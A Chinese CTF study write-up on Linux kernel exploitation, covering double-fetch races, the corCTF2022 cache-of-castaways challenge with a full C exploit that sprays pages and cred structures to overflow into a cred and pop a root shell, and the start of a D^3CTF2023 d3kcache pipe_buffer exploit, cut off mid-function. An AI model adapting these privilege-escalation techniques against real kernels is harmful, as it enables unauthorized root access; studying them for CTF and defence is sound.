Double Fetch 从漏洞原理上属于条件竞争漏洞,是一种内核态与用户态之间的数据访问竞争。

在 Linux 等现代操作系统中,虚拟内存地址通常被划分为内核空间和用户空间。内核空间负责运行内核代码、驱动模块代码等,权限较高。而用户空间运行用户代码,并通过系统调用进入内核完成相关功能。通常情况下,用户空间向内核传递数据时,内核先通过通过 copy_from_user 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理,但在输入数据较为复杂时,内核可能只引用其指针,而将数据暂时保存在用户空间进行后续处理。此时,该数据存在被其他恶意线程篡改风险,造成内核验证通过数据与实际使用数据不一致,导致内核代码执行异常。

一个典型的 Double Fetch 漏洞原理如下图所示,一个用户态线程准备数据并通过系统调用进入内核,该数据在内核中有两次被取用,内核第一次取用数据进行安全检查(如缓冲区大小、指针可用性等),当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间,另一个用户态线程可创造条件竞争,对已通过检查的用户态数据进行篡改,在真实使用时造成访问越界或缓冲区溢出,最终导致内核崩溃或权限提升。

corCTF2022 - cache-of-castaways

用于学习Cross-Cache OverflowPage-level Heap Fengshui这两种技术

setsockopt

具体的实现暂且不深入了解

我们使用时只需要知道以下几点

当创建一个协议为PF_PACKET的socket时,如下

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);

如果再先调用 setsockopt()PACKET_VERSION 设为 TPACKET_V1或者TPACKET_V2

1
2
3
4
5
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

1
2
int version = TPACKET_V1;
setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));

那么之后当我们创建如下这样一个结构体时

1
2
3
4
5
6
struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

再调用PACKET_TX_RING或者PACKET_RX_RING

1
2
3
4
5
6
7
8
struct tpacket_req req;

req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));

之后便会分配tp_frame_nr个页框,并且是直接从伙伴系统中提取

并且当关闭socket时,会将这些页框释放

程序分析

内核保护smap,smep,kpti,kaslr这些都开了

关键模块为cache_of_castaway.ko

内部创建了一个分配大小为512的kmem_cache,创建标志设置了slab_account,因此不会和其他kmem_cache合并

模块只注册了ioctl函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
__int64 __fastcall castaway_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 v3; // r12
_QWORD *v5; // rbx
unsigned __int64 v6[6]; // [rsp+0h] [rbp-30h] BYREF

v6[3] = __readgsqword(0x28u);
if ( a2 != 0xCAFEBABE )
{
if ( copy_from_user(v6, a3, 24LL) )
return -1LL;
mutex_lock(&castaway_lock);
if ( a2 == 0xF00DBABE )
v3 = castaway_edit(v6[0], v6[1], v6[2]);
else
v3 = -1LL;
LABEL_5:
mutex_unlock(&castaway_lock);
return v3;
}
mutex_lock(&castaway_lock);
v3 = castaway_ctr;
if ( castaway_ctr <= 399 )
{
++castaway_ctr;
v5 = (_QWORD *)(castaway_arr + 8 * v3);
*v5 = kmem_cache_alloc(castaway_cachep, 0x400DC0LL);
if ( *(_QWORD *)(castaway_arr + 8 * v3) )
goto LABEL_5;
}
return ((__int64 (*)(void))castaway_ioctl_cold)();
}

其中的castaway_add就是简单的从kmem_cache中申请一个obj

但是castaway_edit中存在一个溢出漏洞,会溢出6个字节

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
__int64 __fastcall castaway_edit(unsigned __int64 a1, size_t a2, __int64 a3)
{
char src[512]; // [rsp+0h] [rbp-220h] BYREF
unsigned __int64 v6; // [rsp+200h] [rbp-20h]

v6 = __readgsqword(0x28u);
if ( a1 > 0x18F )
return castaway_edit_cold();
if ( !*(_QWORD *)(castaway_arr + 8 * a1) )
return castaway_edit_cold();
if ( a2 > 0x200 )
return castaway_edit_cold();
_check_object_size(src, a2, 0LL);
if ( copy_from_user(src, a3, a2) )
return castaway_edit_cold();
memcpy((void *)(*(_QWORD *)(castaway_arr + 8 * a1) + 6LL), src, a2);
return a2;
}

编辑堆块时应该传入如下结构

1
2
3
4
5
struct request {
int64_t index;
size_t size;
void *buf;
};

因为是复现,所以就直接说明思路了

  1. 首先排干原有的cred_jar

  2. 接着通过setsockopt进行大量的基于buddy system的页级内存分配

    可以看到内核刚启动时,buddy system中也并没有太多低order的空闲页

    1
    2
    3
    4
    ctf@CoR:~$ cat /proc/buddyinfo 
    Node 0, zone DMA 0 0 0 0 0 0 0 0 1 1
    Node 0, zone DMA32 3 2 2 2 0 1 2 3 2 2
    Node 0, zone Normal 2 2 2 2 0 2 1 2 2 2

    那么当进行大量分配时,必然会取到许多原本是物理相邻的页

  3. 之后我们再每间隔一个页便释放掉一个,然后再大量clone进程(使用clone能够减少一些噪声影响),其中最主要的希望这些被释放的页被cred_jar使用

  4. 继续释放剩余的页,并将其申请为castaway_cache的slab页,然后触发所有object的溢出漏洞,寄希望能够出现某一个object溢出后刚好修改位于下一个页的cred结构体

  5. 进行询问操作,判断是否存在子进程的uid被成功修改

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sched.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>

#define PGV_PAGE_NUM 1000
#define PGV_CRED_START (PGV_PAGE_NUM / 2)
#define CRED_SPRAY_NUM 514

#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define VUL_OBJ_NUM 400
#define VUL_OBJ_SIZE 512
#define VUL_OBJ_PER_SLUB 8
#define VUL_OBJ_SLUB_NUM (VUL_OBJ_NUM / VUL_OBJ_PER_SLUB)

struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

struct castaway_request {
int64_t index;
size_t size;
void *buf;
};

struct page_request {
int idx;
int cmd;
};

enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};

struct timespec timer = {
.tv_sec = 1145141919,
.tv_nsec = 0,
};

int dev_fd;
int cmd_pipe_req[2], cmd_pipe_reply[2], check_root_pipe[2];
char bin_sh_str[] = "/bin/sh";
char *shell_args[] = { bin_sh_str, NULL };
char child_pipe_buf[1];
char root_str[] = "\033[32m\033[1m[+] Successful to get the root.\n"
"\033[34m[*] Execve root shell now...\033[0m\n";

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error: %s\033[0m\n", msg);
exit(EXIT_FAILURE);
}

void alloc(void)
{
ioctl(dev_fd, 0xCAFEBABE);
}

void edit(int64_t index, size_t size, void *buf)
{
struct castaway_request r = {
.index = index,
.size = size,
.buf = buf,
};

ioctl(dev_fd, 0xF00DBABE, &r);
}

int waiting_for_root_fn(void *args)
{
/* we're using the same stack for them, so we need to avoid cracking it.. */
__asm__ volatile (
" lea rax, [check_root_pipe]; "
" xor rdi, rdi; "
" mov edi, dword ptr [rax]; "
" mov rsi, child_pipe_buf; "
" mov rdx, 1; "
" xor rax, rax; " /* read(check_root_pipe[0], child_pipe_buf, 1)*/
" syscall; "
" mov rax, 102; " /* getuid() */
" syscall; "
" cmp rax, 0; "
" jne failed; "
" mov rdi, 1; "
" lea rsi, [root_str]; "
" mov rdx, 80; "
" mov rax, 1;" /* write(1, root_str, 71) */
" syscall; "
" lea rdi, [bin_sh_str]; "
" lea rsi, [shell_args]; "
" xor rdx, rdx; "
" mov rax, 59; "
" syscall; " /* execve("/bin/sh", args, NULL) */
"failed: "
" lea rdi, [timer]; "
" xor rsi, rsi; "
" mov rax, 35; " /* nanosleep() */
" syscall; "
);

return 0;
}

void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}

return socket_fd;

err_setsockopt:
close(socket_fd);
err_out:
return ret;
}

__attribute__((naked)) long simple_clone(int flags, int (*fn)(void *))
{
/* for syscall, it's clone(flags, stack, ...) */
__asm__ volatile (
" mov r15, rsi; " /* save the rsi*/
" xor rsi, rsi; " /* set esp and useless args to NULL */
" xor rdx, rdx; "
" xor r10, r10; "
" xor r8, r8; "
" xor r9, r9; "
" mov rax, 56; " /* __NR_clone */
" syscall; "
" cmp rax, 0; "
" je child_fn; "
" ret; " /* parent */
"child_fn: "
" jmp r15; " /* child */
);
}

int alloc_page(int idx)
{
struct page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int free_page(int idx)
{
struct page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

void spray_cmd_handler(void)
{
struct page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

/* create an isolate namespace*/
unshare_setup();

/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));

if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(0x1000, 1);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}

write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}

int main(int aragc, char **argv, char **envp)
{
cpu_set_t cpu_set;
char th_stack[0x1000], buf[0x1000];

/* to run the exp on the specific core only */
CPU_ZERO(&cpu_set);
CPU_SET(0, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

dev_fd = open("/dev/castaway", O_RDWR);
if (dev_fd < 0) {
err_exit("FAILED to open castaway device!");
}

/* use a new process for page spraying */
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);
if (!fork()) {
spray_cmd_handler();
exit(EXIT_SUCCESS);
}

/* make buddy's lower order clean, castaway_requesting from higher */
puts("[*] spraying pgv pages...");
for (int i = 0; i < PGV_PAGE_NUM; i++) {
if(alloc_page(i) < 0) {
printf("[x] failed at no.%d socket\n", i);
err_exit("FAILED to spray pages via socket!");
}
}

/* free pages for cred */
puts("[*] freeing for cred pages...");
for (int i = 1; i < PGV_PAGE_NUM; i += 2){
free_page(i);
}

/* spray cred to get the isolate pages we released before */
puts("[*] spraying cred...");
pipe(check_root_pipe);
for (int i = 0; i < CRED_SPRAY_NUM; i++) {
if (simple_clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND,
waiting_for_root_fn) < 0){
printf("[x] failed at cloning %d child\n", i);
err_exit("FAILED to clone()!");
}
}

/* free pages for our vulerable objects */
puts("[*] freeing for vulnerable pages...");
for (int i = 0; i < PGV_PAGE_NUM; i += 2){
free_page(i);
}

/* spray vulnerable objects, hope that we can make an oob-write to cred */
puts("[*] trigerring vulnerability in castaway kernel module...");
memset(buf, '\0', 0x1000);
*(uint32_t*) &buf[VUL_OBJ_SIZE - 6] = 1; /* cred->usage */
for (int i = 0; i < VUL_OBJ_NUM; i++) {
alloc();
edit(i, VUL_OBJ_SIZE, buf);
}

/* checking privilege in child processes */
puts("[*] notifying child processes and waiting...");
write(check_root_pipe[1], buf, CRED_SPRAY_NUM);
sleep(1145141919);

return 0;
}

与用户态能够较为精准的控制我们所需要的数据结构不同

内核态要复杂的多,其中存在着大量的噪声操作干扰我们的控制,因此无法做到准确的控制

因此在内核态的利用中,我们需要大量地重复某一个操作,以希望其中某一个能够成功命中

D^3CTF2023 - d3kcache

文件系统是ext4,解压出来后发现没有init脚本

对文件系统不太了解,先不管了

启动脚本可以看到开启了kaslr,kpti,smap,smep默认应该也是开启的

fcntl(F_SETPIPE_SZ)

之前一直感到疑惑pipe_buffer结构体大小只有0x28,为什么是从kmalloc-cg-1k获得object

注意到pipe_buffer的分配过程中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

....

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);

if (pipe->bufs) {
init_waitqueue_head(&pipe->wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->buffers = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}
....
}

pipe->bufs实际上是一个pipe_buffer结构体数组,其默认会分配PIPE_DEF_BUFFERS(其值默认为16)个pipe_buffer

大小为640,故属于kmalloc-cg-1k

存在一个系统调用fcntl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
{
struct pipe_inode_info *pipe;
long ret;

pipe = get_pipe_info(file, false);
if (!pipe)
return -EBADF;

__pipe_lock(pipe);

switch (cmd) {
case F_SETPIPE_SZ:
ret = pipe_set_size(pipe, arg);
//...

static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long arg)
{
struct pipe_buffer *bufs;
unsigned int size, nr_pages;
unsigned long user_bufs;
long ret = 0;

size = round_pipe_size(arg);
nr_pages = size >> PAGE_SHIFT;

if (!nr_pages)
return -EINVAL;

/*
* If trying to increase the pipe capacity, check that an
* unprivileged user is not trying to exceed various limits
* (soft limit check here, hard limit check just below).
* Decreasing the pipe capacity is always permitted, even
* if the user is currently over a limit.
*/
if (nr_pages > pipe->buffers &&
size > pipe_max_size && !capable(CAP_SYS_RESOURCE))
return -EPERM;

user_bufs = account_pipe_buffers(pipe->user, pipe->buffers, nr_pages);

if (nr_pages > pipe->buffers &&
(too_many_pipe_buffers_hard(user_bufs) ||
too_many_pipe_buffers_soft(user_bufs)) &&
is_unprivileged_user()) {
ret = -EPERM;
goto out_revert_acct;
}

/*
* We can shrink the pipe, if arg >= pipe->nrbufs. Since we don't
* expect a lot of shrink+grow operations, just free and allocate
* again like we would do for growing. If the pipe currently
* contains more buffers than arg, then return busy.
*/
if (nr_pages < pipe->nrbufs) {
ret = -EBUSY;
goto out_revert_acct;
}

bufs = kcalloc(nr_pages, sizeof(*bufs),
GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
if (unlikely(!bufs)) {
ret = -ENOMEM;
goto out_revert_acct;
}

/*
* The pipe array wraps around, so just start the new one at zero
* and adjust the indexes.
*/
if (pipe->nrbufs) {
unsigned int tail;
unsigned int head;

tail = pipe->curbuf + pipe->nrbufs;
if (tail < pipe->buffers)
tail = 0;
else
tail &= (pipe->buffers - 1);

head = pipe->nrbufs - tail;
if (head)
memcpy(bufs, pipe->bufs + pipe->curbuf, head * sizeof(struct pipe_buffer));
if (tail)
memcpy(bufs + head, pipe->bufs, tail * sizeof(struct pipe_buffer));
}

pipe->curbuf = 0;
kfree(pipe->bufs);
pipe->bufs = bufs;
pipe->buffers = nr_pages;
return nr_pages * PAGE_SIZE;

out_revert_acct:
(void) account_pipe_buffers(pipe->user, nr_pages, pipe->buffers);
return ret;
}

当选项为F_SETPIPE_SZ

其会修改当前pipe的bufs数组大小为第三个参数(arg>>12)*sizeof(*bufs)

例如当我们使用fcntl(pipe_fd, F_SETPIPE_SZ, 0x1000 * 64)

就会更改bufs从kmalloc-cg-2k进行分配

模块分析

在模块初始化的时候创建了一个kmem_cache,大小为2048,并且开启了SLAB_ACCOUNT标志位

自定义的 ioctl 函数提供了分配、追加编辑、释放、读取的一个堆菜单,漏洞便出在追加编辑当中,当写满 2048 字节时存在着一个 \0 字节的溢出:

目标是利用这一个零字节的溢出修改pipe_buffer结构体page指针,使得两个pipe_buffer指向同一个struct page,进而使得两个pipe_buffer使用同一个物理页框

arttnba3大佬在该利用基础上提供了三种解题方法

一千多行的exp:理解有点困难,暂时先放一放

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
1221
1222
1223
1224
1225
1226
1227
1228
1229
1230
1231
1232
1233
1234
1235
1236
1237
1238
1239
1240
1241
1242
1243
1244
1245
1246
1247
1248
1249
1250
1251
1252
1253
1254
1255
1256
1257
1258
1259
1260
1261
1262
1263
1264
1265
1266
1267
1268
1269
1270
1271
1272
1273
1274
1275
1276
1277
1278
1279
1280
1281
1282
1283
1284
1285
1286
1287
1288
1289
1290
1291
1292
1293
1294
1295
1296
1297
1298
1299
1300
1301
1302
1303
1304
1305
1306
1307
1308
1309
1310
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* root checker and shell poper */
void get_root_shell(void)
{
if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(5);
exit(EXIT_FAILURE);
}

puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

system("/bin/sh");

/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/**
* @brief create an isolate namespace
* note that the caller **SHOULD NOT** be used to get the root, but an operator
* to perform basic exploiting operations in it only
*/
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

/**
* II - interface to interact with /dev/kcache
*/
#define KCACHE_SIZE 2048
#define KCACHE_NUM 0x10

#define KCACHE_ALLOC 0x114
#define KCACHE_APPEND 0x514
#define KCACHE_READ 0x1919
#define KCACHE_FREE 0x810

struct kcache_cmd {
int idx;
unsigned int sz;
void *buf;
};

int dev_fd;

int kcache_alloc(int index, unsigned int size, char *buf)
{
struct kcache_cmd cmd = {
.idx = index,
.sz = size,
.buf = buf,
};

return ioctl(dev_fd, KCACHE_ALLOC, &cmd);
}

int kcache_append(int index, unsigned int size, char *buf)
{
struct kcache_cmd cmd = {
.idx = index,
.sz = size,
.buf = buf,
};

return ioctl(dev_fd, KCACHE_APPEND, &cmd);
}

int kcache_read(int index, unsigned int size, char *buf)
{
struct kcache_cmd cmd = {
.idx = index,
.sz = size,
.buf = buf,
};

